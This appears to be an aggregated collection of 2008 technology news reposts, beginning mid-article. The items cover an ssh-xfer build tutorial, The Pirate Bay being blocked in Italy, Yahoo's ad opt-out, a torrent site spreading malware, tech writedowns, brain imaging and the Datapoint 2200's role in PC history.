"In the Web 2.0 world, building a strong network is critical to managing your career. Utilizing tools such as Linkedin, Facebook, and Plaxo to build your professional network early in your college career is an important first step," Alexander says. "Also, try to seek out skill enhancement opportunities that are aligned to your career goals."

Google, Drupal and Red Hat are only a few of many organizations that offer open source opportunities to students. SourceForge.net hosts a "help wanted" board for non-commercial, open source project volunteer openings. AgoraCart survives on help from the community, and posts jobs, internships, and volunteer positions. The Apache Software Foundation also provides support for the Apache community of open source software projects. So take that first step -- do some research, get involved with the open source community, find a sponsor, and dive into a potentially lucrative and successful IT career.

Amber Gillies has worked in journalism for more than 10 years and holds a bachelor's degree in computer science.

Original here

ssh-xfer: Quickly grabbing files over an existing SSH connection

By Ben Martin

The Secure Shell (SSH) and Secure Copy (SCP) make remotely performing system administration and copying files across secure links a painless operation. SSH and SCP use the same SSH protocol to protect network communications, but they rely on users knowing if they want a shell or to copy a file beforehand. You cannot easily use an existing SSH shell connection to a remote machine and just grab one or two files; if you want the files, you'll have to make another SSH connection for the file copy using SCP -- unless you have ssh-xfer.

The ssh-xfer project uses the local SSH agent to allow you to easily grab files using an existing SSH shell connection. You do not have to modify either the SSH client or server programs to use ssh-xfer -- but you will need to patch your ssh-agent. Although having to patch the ssh-agent is not ideal, you do gain one major advantage by doing this: you can send a file through more than one SSH connection. So if you first connect to the firewall and then you connected to a remote server from there, and from that remote server to a remote desktop machine, and from the shell on the remote desktop machine you decide to grab /etc/foo.conf, you don't have to think about how you to got there from your desktop, or how to SCP the file back via all the intermediate hosts. Simply run ssh-xfer /etc/foo.conf from the shell on the remote machine and the file will appear on your local machine's ~/Desktop -- or you can change the XFER_DEST_DIR definition in the ssh-xfer patch to specify a different default directory for transfers. Of course you'll need the ssh-xfer program to be available on the remote machine, but you don't need to change the SSH installation on any of the servers at all.

ssh-xfer is not packaged for Fedora, Ubuntu, or openSUSE. In this article I'll use a 64-bit Fedora 9 machine and build from source using ssh-xfer version 0.15 built against OpenSSH version 5.0p1-3.fc9 from the Fedora 9 updates repository.

The rpmbuild --recompile command below prepares and builds OpenSSH, including all the patches that Fedora adds to OpenSSH. Because we intend to patch the SSH agent, it is a good idea to recreate its source as the distribution uses it before applying the ssh-xfer patch. I found that a few parts of the patch did not apply cleanly to the current source, but these mainly related to slightly different return values (returning zero instead of nothing) and other things that are a fairly easy fix for a human but which deter the patch from working cleanly. I have uploaded an updated patch generated using OpenSSH version 5.0p1-3.fc9 from Fedora 9 updates to save others the time of performing these fixes.


$ rpmbuild --recompile /FromWeb/openssh-5.0p1-3.fc9.src.rpm
$ cd ~/rpmbuild/BUILD/openssh-5.0p1/
$ patch -p0 < /FromWeb/ssh-xfer-0.15.diff
...
patching file ssh-agent.c
...
Hunk #16 FAILED at 1417.
2 out of 16 hunks FAILED -- saving rejects to file ssh-agent.c.rej
... use my patch above or fix these issues by hand.

Once you have the sources patched, the below commands reconfigure the source tree and rebuild the ssh-agent and the new ssh-xfer program. Then you need to run the modified ssh-agent on your local desktop machine and have the ssh-xfer binary available on the remote machines that you might want to grab files from. If you are running the same distribution on remote machines as the one you built the ssh-agent and ssh-xfer, using SCP is probably the easiest way to get ssh-xfer onto the remote hosts.


$ ./config.status
$ make all ssh-xfer
$ su -l

# chown root:root ssh-xfer
# chmod 755 ssh-xfer
# scp -pv ssh-xfer myserver:/usr/local/bin
# install --mode 755 ssh-agent /usr/local/bin/ssh-agent-xfer

To use ssh-xfer you need to be running the modified SSH agent and have authentication agent connection forwarding enabled. There is a potential security issue with using agent forwarding, so it is not enabled by default. Basically, if there is a means to bypass file permissions on the machine you connect to with agent forwarding, then someone who can bypass the security on the remote machine can access your local SSH agent. This security issue makes sense if you consider that you are enabling a feature that forwards connections to the agent on the remote machine to the agent on your local machine.

With the commands shown below, I first create a new local bash shell using the patched ssh-agent that has ssh-xfer support, then I SSH into a remote machine, create a new file there, and then ssh-xfer it back to my desktop machine.


ben@desktop ~$ ssh-agent-xfer bash
ben@desktop ~$ ssh -A ben@myserver
ben@myserver ~$ date > myserver-testfile.txt
ben@myserver ~$ ssh-xfer myserver-testfile.txt
Sending file
. done.
ben@myserver ~$ exit
ben@myserver ~$ cd ~/Desktop
ben@desktop Desktop$ ls -lh
-rw------- 1 ben ben 29 2008-07-21 21:11 myserver-testfile.txt
ben@desktop Desktop$ cat myserver-testfile.txt

Original here
Mon Jul 21 21:19:14 EST 2008

The use of SSH agent forwarding might make some avoid using ssh-xfer. The ssh-xfer homepage even describes it has hackish and states that the protocol used to transfer file bytes is not very sophisticated. Because ssh-xfer is agent-based, you can directly download a file through SSH connections that have been chained together (connect to host b, then from b to c to d). This keeps you from needing to remember exactly which connections you used to get to the host you are currently looking at in order to download a file.

In bygone days when one connected to a Unix machine using a dial-up connection and a terminal program, you could issue commands and initiate a download directly from the console. The idea of extending the SSH agent to allow for file transfers brings some of the power that was available in the old days to modern SSH connections by allowing file transfer to be initiated directly from a remote terminal.

Ben Martin has been working on filesystems for more than 10 years. He completed his Ph.D. and now offers consulting services focused on libferris, filesystems, and search solutions.

The Pirate Bay Blocked in Italy

The Pirate Bay has been “censored” in Italy following an urgent decree from a deputy public prosecutor. Pirate Bay’s IPs and the domain name are inaccessible, as they are blocked by ISPs all over the country. Whether these blocks will be very effective, however, is doubtful, since The Pirate Bay has already announced several countermeasures.

pirate bayAn insider working at an Internet provider in Italy told TorrentFreak that all the relevant large access ISPs in Italy have complied with the request to block the popular BitTorrent tracker, which was sent out yesterday.

Italy is taking a stand against BitTorrent sites, so it seems. Two weeks ago, the largest Italian torrent site, Columbo-BT, was shut down by the same prosecutor who is responsible for the Pirate Bay block. IFPI, the infamous anti-piracy organization assisted the prosecutor, and it wouldn’t be a surprise if they assisted in this case as well, considering their history with The Pirate Bay.

In a response to the news, Pirate Bay co-founder Peter Sunder told TorrentFreak that they have already implemented countermeasures to make sure all Italians will be able to access their site. “We’re working on setting up a really annoying system for them to filter,” he said. “Some of the ISPs decided to nullroute - so we changed IP so it works for them now some other decided to block the domain name so we added labaia.org, which means “the bay” in Italian.”

As usual, the popular BitTorrent tracker is not going down without a fight, and The Pirate Bay team is determined to keep the site accessible to all Italians. They will also contact the prosecutor, and they invite Italian lawyers who know how to counter this legally, to contact them.

“We’re quite used to fascist countries not allowing freedom of speech. A lot of smaller nations that have dictators decide to block our site since we can help spread information that could be harmful to the dictators,” Sunde wrote in a blog entry.

This is not the first time that ISPs were forced to block access to The Pirate Bay. In February, a Danish court ordered the ISP “Tele2″ to block its customers from accessing the site. The decision, which is currently under appeal, once again heated the debate on ISPs Internet filtering.

This Danish court case was initiated by the IFPI, that later tried to use the “landmark decision” to force Swedish ISPs to do the same, but failed. In fact, it seems that filtering traffic to The Pirate Bay is actually illegal according to European law, and it is highly doubtful that the block in Italy is lawful.

Sunde has his suspicions about the reason for the block, he told us: “It’s quite funny that the country Italy is run by the biggest media mogul of them all. we’re his competitors.” Whether or not Berlusconi was personally involved, blocking The Pirate Bay is doomed to fail, and will only strengthen the popularity of the site in Italy.

Original here

Yahoo to let visitors decline more targeted ads

Yahoo Inc. will let its Web visitors decline ads targeted to their browsing habits, becoming the latest Internet company to break from a common industry practice as Congress steps up scrutiny of customized advertising and consumer privacy.

Yahoo has been offering that opt-out choice only to ads the company runs on outside, partner sites. Yahoo said Friday it now would extend that option to ads displayed on its own sites, to boost users' trust _ and in doing so, perhaps draw visitors from its rivals.

The option will likely be available by the end of the month.

Yahoo spokeswoman Kelley Benander said the change has been in the works for some time, but the company decided to announce it early in response to an inquiry from the House Energy and Commerce Committee, whose subcommittee on the Internet held a hearing last month questioning online advertising practices.

Visitors who decline would still see ads, but not ones delivered through "behavioral targeting" _ in which a site displays ads for golf carts, for instance, to visitors who frequent golf sites, even when they are reading about Paris Hilton. Instead, they'd see a generic ad.

The policy change does not affect Yahoo's other targeted ads, such as those tied to search terms or location.

Nor does it stop the collection and retention of data that had been used to generate targeting profiles. Yahoo said it still needs the information for other reasons, including fraud detection and law-enforcement requests.

Yahoo said most consumers prefer targeted ads because they are most relevant to them. Furthermore, because people generally don't bother or know how to change Web site settings, the choice should have little effect on the company's ability to sell targeted ads, for which Yahoo can charge more because they reach specific users most likely to buy something.

Although some privacy groups believe targeted ads should be permitted only when a user expressly consents, Pam Dixon of the World Privacy Forum praised Yahoo's expanded opt-out approach, which assumes permission unless a user takes steps to decline. Dixon said relatively few companies have offered even that choice on their own sites.

Time Warner Inc.'s AOL began extending the option to its own sites late last year, incorporating technology it acquired with the purchase of the behavioral-targeting firm Tacoda. Microsoft Corp. also allows opt out on its own sites.

Google Inc.'s privacy policy offers opt out to third-party sites only, though the company says it conducts little, if any, behavioral targeting. Instead, Google has focused on contextual targeting, in which ads are influenced by one's search terms or the text of a Web article.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

Original here

TrafficLoader.com to Infect BitTorrent Users with Malware

A new BitTorrent site has appeared which will allow scammers and spammers to infect its users with spyware, malware and viruses. An admin of TrafficLoader.com says that no bad torrents will ever be removed from the site and is inviting people to upload malicious software to infect torrent users.

TrafficLoaderHere at TorrentFreak we get a few emails each week announcing the arrival of new BitTorrent sites but there are so many, we can’t possibly write about them all. Instead, due to time limitations, we write about ones which are topical in some way or offer some interesting or unique features. Today we report on a new torrent site which does indeed have an interesting feature, although most won’t appreciate it.

One of the main drawbacks of using P2P software such as Limewire, is that the content on the network (Gnutella) is unmoderated - anyone is free to put up whatever they like, be it music, movies or TV shows. Of course, others use this lack of moderation as a green light to upload viruses, spyware and other malicious software. Equally, one of the great strengths of BitTorrent (at least from a harm-reduction point of view), is that .torrent files are uploaded to torrent sites where staff work hard to filter out as much of the malicious software as they can, making BitTorrent relatively malware-free.

Of course, this great system falls apart if you can’t trust the people running the site. People expect anti-pirates like MiiVi to be ‘the enemy within’, but who needs those when you have ‘friends’ like the guys at new torrent site, TrafficLoader.com.

TrafficLoader.com (and its forum, pdls.info) hasn’t been setup for the benefit of BitTorrent users, it will be used by spammers, scammers and virus peddlers to spread their malicious software among the community (and make money off it). One of the admins called ‘Satty’ says that no registration is needed to upload torrents to the site and none will ever be removed. The site does have a notice - ‘Viruses, spyware, affiliate links and everything related is strictly prohibited’ but don’t believe it - Satty says these rules don’t apply to his friends in the PPI (Pay Per Install) community.

A few days ago the site was pretty bare with relatively few torrents and it was clear that most of them contained malware. It was suggested to Satty that it might be a good idea to have some genuine torrents too, to help disguise the bad torrents. Now things are starting to ‘improve’ on the site with many more torrents added recently which don’t immediately appear to be malware.

In the last few days, TrafficLoader cosmetically ‘cleaned up’ the site to remove porn adverts in order to appear more genuine but unfortunately, someone as well as TorrentFreak noticed that they made a big mistake:

“Why would you [Satty, admin] put a forum for ppi on a publicly scraped site, a.k.a here?? Do you just want ppl to find out shit is full of malware?”

Just in case they did want people to find out, hopefully this post will help them get the word out.

For those that want advice on how to avoid bad torrents in the future, try one of our guides.

Update: The site was taken offline a few hours after this article was posted, that’s our good deed for the weekend.

Original here

No Takebacks: 5 Most Screwed-Up Tech Buys

Stacey Higginbotham,


As the tech world gets itself in a tizzy over Google saying its 5 percent stake in AOL might be impaired — basically it may now be worth less than they thought it was — we thought we’d revisit some of the most notable tech writedowns in history. Under U.S. accounting rules, once something’s impaired, it can’t be marked up again, which typically leads to a write-off. The write-offs on our list aren’t necessarily the largest, but we think they exemplify a certain point in time in the fizzy world of technology valuations that’s worth remembering, but not worth repeating.

So far this year we’ve seen one of the largest corporate writedowns ever, that of Sprint-Nextel shaving $29.7 billion in value off its $35 billion merger with Nextel Communications. The writedown led to Sprint-Nextel posting a fourth-quarter loss of $29.9 billion, and the company is still dealing with the aftermath of its push-to-talk love affair. At the time of the merger, cell phone deals were the thing to do, but mismatched networks and customer bases doomed this one from the start.


Another relatively recent write-off occurred when eBay woke up next to Skype two years after it offered up to $4.1 billion for the peer-to-peer voice provider and realized it paid waaaay too much for the privilege. It wrote off $900 million, which is small potatoes compared to some of the other writedowns listed here, but worth mentioning as a case of new technology feeding off an old-school web giant’s desperation.

AOL’s purchase of Time Warner back in 2000 was spectacular both for its $106.2 billion price tag and its almost instant failure once the deal closed. By that point, the tech bubble had burst and in 2002 the combined company wrote down $54 billion thanks to the evaporation of AOL’s value. Even the easy money economy of the previous few years has yet to see a deal of such awesome valuation, something for which we can all be thankful.

The dot-com crash was followed by another wave of writedowns related to the companies that had banked on the Internet infrastructure rush, such as Qwest Communications, which spent $36.5 billion on U.S. West in 1999, only to turn around and write down $24 billion of that in 2002.

I’ll put Google’s possible impairment on here simply because it’s amazing that AOL has managed to convince two companies to overpay for it, even as it does its own dubious buys. Since many financial experts are predicting a new wave of impairment charges, perhaps Google’s taking one of the first steps toward write-offs in the tech sector based on the Web 2.0 boom.

Original here

The Brain Unmasked

New imaging technologies reveal the intricate architecture of the brain, creating a blueprint of its connectivity.

By Emily Singer

Brain mapping: A variation on MRI called diffusion spectrum imaging allows scientists to map the neural fibers that relay signals in the brain. Each fiber in the image represents hundreds to thousands of fibers in the brain, each traveling along the same path.
Credit: George Day, Ruopeng Wang, Jeremy Schmahmann, Van Wedeen, MGH

The typical brain scan shows a muted gray rendering of the brain, easily distinguished by a series of convoluted folds. But according to Van Wedeen, a neuroscientist at Massachusetts General Hospital, in Boston, that image is just a shadow of the real brain. The actual structure--a precisely organized tangle of nerve cells and the long projections that connect them--has remained hidden until relatively recently.

Traditional magnetic resonance imaging, or MRI, can detect the major anatomical features of the brain and is often used to diagnose strokes and brain tumors. But advances in computing power and novel processing algorithms have allowed scientists to analyze the information captured during an MRI in completely new ways.

Diffusion spectrum imaging (DSI) is one of these twists. It uses magnetic resonance signals to track the movement of water molecules in the brain: water diffuses along the length of neural wires, called axons. Scientists can use these diffusion measurements to map the wires, creating a detailed blueprint of the brain's connectivity.

On the medical side, radiologists are beginning to use the technology to map the brain prior to surgery, for example, to avoid important fiber tracts when removing a brain tumor. Wedeen and others are now using diffusion imaging to better understand the structures that underlie our ability to see, to speak, and to remember. Scientists also hope that the techniques will grant new insight into diseases linked to abnormal wiring, such as schizophrenia and autism.

On the next page is an animation of the wiring of a marmoset monkey.

Original here

Forgotten PC history: The true origins of the personal computer

The PC's back story involves a little-known Texas connection

By Lamont Wood
This year marks an almost forgotten 40th anniversary: the conception of the device that ultimately became the PC. And no, it did not happen in California.

For decades, histories have traced the PC's x86 lineage back to 1972, with Intel Corp.'s introduction of the 8008 chip, the 8-bit follow-on to the 4-bit 4004, itself introduced in 1971 and remembered as the world's first microprocessor (download PDF).

But the full story was not that simple. For one thing, the x86's lineage can be traced back four additional years, to 1968, and it was born at a now-defunct firm in San Antonio. The x86 was originally conceived by an all-but-forgotten engineer, Austin O. "Gus" Roche, who was obsessed

with making a personal computer. For another thing, Intel got involved reluctantly, and the 8008 was not actually derived from the 4004 -- they were separate projects.

Industrial designer John "Jack" Frassanito, head of John Frassanito & Associates Inc., a NASA contractor in Houston, remembers wincing while plans for the device were drawn by Roche on perfectly good tablecloths in a private club in San Antonio in 1968. He was then a young account manager for legendary designer Raymond Lowey (who did the Coke bottle and the Studebaker Avanti, among other things). Frassanito was sent to Computer Terminal Corp. in San Antonio to help design CTC's first product, an electronic replacement for the Model 33 Teletype. CTC had been recently founded with local backing by former NASA engineers Phil Ray and Roche.

After arriving in San Antonio -- where he soon joined CTC's staff -- Frassanito said that he quickly discovered that the teletype-replacement project was merely a ruse to raise money for the founders' real goal of building a personal computer.

A hidden agenda

"When writing the business plan, they decided to stay away from the notion of a personal computer, since the bankers they were talking to had no idea what a computer was or wasn't," Frassanito recalled. "So for the first product, they needed something they could get off the ground with existing technology. But the notion from the get-go was to build a personal computer firm."

The resulting terminal, the Datapoint 3300, established CTC as a going concern, and planning began on the project that Frassanito realized was Roche's obsession. He remembers lengthy discussions with Roche about what a personal computer should do and look like. Roche often expressed himself using metaphors from various classics, such as Machiavelli's The Prince, which Frassanito found necessary to read.

To ensure a market for the machine, Frassanito said that the CTC founders decided to promote it (with appropriate programming) as a replacement for the IBM 029 card punch machine, and they gave it a half-height display to match the aspect of an IBM punch card. To keep it from being intimidating in an office, they gave it the same footprint as an IBM Selectric typewriter.

The resulting compact enclosure had heat problems, and in late 1969 and early 1970, the designers began looking for ways to reduce the number of components, including reducing the CPU board to one chip.

The start of Intel's involvement

Frassanito recalled accompanying Roche to a meeting with Bob Noyce, head of Intel, in early 1970 to try to get Intel -- then a start-up devoted to making memory chips -- to produce the CPU chip. Roche presented the proposed chip as a potentially revolutionary development and suggested that Intel develop the chip at its own expense and then sell it to all comers, including CTC, Frassanito recalled.

"Noyce said it was an intriguing idea, and that Intel could do it, but it would be a dumb move," said Frassanito. "He said that if you have a computer chip, you can only sell one chip per computer, while with memory, you can sell hundreds of chips per computer." Nevertheless, Noyce agreed to a $50,000 development contract, Frassanito recalled.

Frassanito's recollection of Noyce's negative reaction is echoed in the transcript of a group interview done in September 2006 at the Computer History Museum in Mountain View, Calif. (download PDF). The group included six people who were involved in the development or marketing of Intel's first CPU chips: Federico Faggin, Hal Feeney, Ed Gelbach, Ted Hoff, Stan Mazor and Hank Smith. They agreed that Intel's management at the time feared that if Intel put a CPU chip in its catalog, the computer vendors that were Intel's customers for memory chips would see Intel as a competitor and go elsewhere for memories.

That fear, they indicated, was evident as late as 1973. The group also recalled that work was suspended on the CTC chip, called the 1201, in the summer of 1970 after CTC lost interest, having decided to go ahead with a CPU board using transistor-transistor-logic (TTL) circuits instead of relying on a chip-based design. TTL is the level of integration that preceded microcircuits, where a chip might have tens of transistors rather than thousands.

Hoff, then an Intel engineer, wasn't surprised. The CTC processor architecture "could go to 16,000 bytes of memory, and if you were going to spend that much on memory, then there was no sense in saving maybe $50 on the processor by moving it out of TTL," Hoff told Computerworld. Memory fell to a penny a bit in 1972, he recalled, so 16KB would have then cost $1,280 (around $6,700 today).

The 2200 debuts

CTC's TTL-based desktop personal computer, called the Datapoint 2200, was unveiled in 1970, with cassette tapes for 130KB of mass storage and 8K of internal memory. The first end-user sale (for 40 units) was to General Mills on May 25, 1970.

Following IBM's marketing model, the machines were leased: $168 monthly for a machine with 8K of memory, and $148 for 2K, with modems adding $30 monthly. RAM was not then available, so for internal memory the unit used recirculating MOS memory, with an access time of up to 500 microseconds for the first byte and 8 microseconds per sequential byte thereafter.

Aaron Goldberg, who in the 1970s was a researcher at IDC and is now vice president at Ziff Davis Media Market Experts in New York, remembered the Datapoint 2200 as one of the first single-user minicomputers, in the same class as the IBM 5320. "These were industrial-strength products. They were trying to downsize [mainframe] business applications," he recalled.

The logic unit appeared to be 8 bits wide, but the processor actually had to loop eight times to process a byte, noted Jonathan Schmidt, then with CTC and now vice president at Perftech Inc. in San Antonio.

Datapoint 2200
Production version of the Datapoint 2200.

At Intel, with the CTC chip on hiatus, development proceeded on the 4004, a 4-bit processor chip for Busicom, a now-defunct Japanese calculator firm that contracted with Intel before CTC, although work on the two projects began at about the same time. But after six months, Seiko Holdings Corp., another Japanese firm, expressed interest in using CTC's 1201 chip for a scientific calculator, and Intel resumed development on the CTC chip. The delay let the 1201 designers upgrade from a 16-pin to an 18-pin package.

CTC had also given a second-source contract to Texas Instruments Inc. Delivered in late 1970 or early 1971, the TI version of the 1201 chip never worked well, and the project was abandoned, Frassanito recalled. The Computer History Museum interviewees said that it was inadvertently sabotaged when TI used an initial specification -- produced for CTC by Intel -- that proved to be flawed.

Datapoint 2200 blueprint
Blueprint of the Datapoint 2200 enclosure, showing the crowded interior. Click to view larger image.

Intel's 1201 chip was delivered to CTC in late 1971, but by then CTC was developing the Datapoint 2200 II, which ran much faster and supported a hard drive, and CTC's management was not interested in a chip that it now considered obsolete. Outvoting Roche, who Frassanito said was white-faced with shock at the decision, they dropped the project and abandoned the 1201 chip's intellectual property to Intel.

Giving all 1201 rights to Intel

"Roche said the idea that you can print a computer on a chip is astounding, a profound innovation, and we should own the intellectual property," Frassanito recalled. "They said, why spend $50,000 for a product we can't use? It was one of the worst business decisions in history."

The 4004 was put in the Intel catalog in November 1971, becoming history's first commercial microprocessor. The 1201, renamed the 8008, was offered in April 1972, for $120. Unlike the 4004, the 8008 could use standard RAM (which had become available) and ROM memory, making it popular with embedded applications, the interviewees recalled. Since no one was using the chip initially to compete against the mainstream computer vendors, there was no backlash from them, and the nervousness of Intel's management eventually eased.

Also in 1972, design Patent 224,415 was issued to Roche, Ray, and Frassanito for the appearance of the Datapoint 2200, allowing them to say they held the patent for the first PC. (Other parties claimed utility patents for the microprocessor, and the precedence of these other patents was in litigation for decades.)

In 1974, Intel brought out the 8080 chip based on the same architecture as the 8008, using suggestions from CTC engineers derived from developing the Datapoint 2200 II. Its use of a recently developed 40-pin package meant that fewer support chips were required to multiplex the output. Its descendants formed the x86 dynasty, especially after the 8088 was used in the first IBM PC in 1981.

Therefore, any PC in use today can trace its ancestry to the Datapoint 2200.

"I can look at a current PC and still see the image of that original machine buried down in there, with a lot of other stuff, especially more registers," said Victor D. Poor, then a CTC executive, now retired in Melbourne, Fla.

Patent screen
Opening screen at the Web site of the U.S. Patent and Trademark Office for design Patent 224,415, assigned to CTC's Ray, Roche and Frassanito.

Intel went on to make billions of dollars off its x86 line. As for CTC, it changed its name to Datapoint at the end of 1972, and some of the same engineers involved in the Datapoint 2200 project were involved in developing the first commercial local-area network -- ARCnet -- which came out in 1977. But in the 1980s Datapoint went into decline, thrown into turmoil by an accounting scandal. Later, like many minicomputer firms, it proved unable to compete with cheaper PCs -- Datapoint's progeny, ironically. Datapoint's remnants were liquidated in 2000.

Roche died in a car accident in 1975, Ray died in 1987, and Noyce died in 1990. Frassanito left Datapoint to set up his own firm in 1975 and worked on the space shuttle and space station projects, among other things.

It turns out that the Datapoint 2200 was never used as an IBM 029 card punch replacement that he knew of.

Wood is a freelance writer in San Antonio

Original here